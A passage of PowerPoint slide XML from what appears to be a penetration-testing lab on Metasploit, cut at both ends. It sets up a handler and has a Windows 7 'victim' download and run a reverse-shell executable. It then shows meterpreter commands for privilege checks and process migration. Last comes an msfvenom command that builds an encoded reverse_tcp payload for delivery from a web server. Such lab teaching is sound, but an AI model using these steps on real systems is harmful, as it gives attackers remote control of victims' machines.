            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>192.168.248.130</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="728980">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1245"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf exploit(handler) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>443</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="728980">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1245"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf exploit(handler) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="178435" indent="-165735">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="179070" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Run Wireshark on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kali!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1210"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>On Windows 7 victim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>machine</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>–	Surf  and download:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" u="sng" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.248.130/reverse_https.exe</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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274573" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="844550">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Exploitations </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>and Actions on</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231140" y="1130553"/>
            <a:ext cx="8343265" cy="3915410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>On Windows 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>victim machine </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>reverse_https.exe</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>On Kali you should receive a reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="50" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>connection!</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Do some actions on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>target:</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>getprivs</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="5080" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
                <a:tab pos="4339590" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>migrate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1392	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(any System privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-130" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or  a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>consistent process such as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Explorer.exe)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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274573" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2070100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Further</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Weaponization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231140" y="1131570"/>
            <a:ext cx="8608695" cy="3456304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Encode your executable on Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-135" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(192.168.32.1369):</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="5080" indent="-287020">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="2560955" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>–	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>root@kali:~#	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msfvenom -p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-e  x86/shikata_ga_nai -i 5 -b ‘\x00’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LHOST=192.168.32.136  LPORT=443 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-f exe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/var/www/html/Encoded_Reverse_Https.exe</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
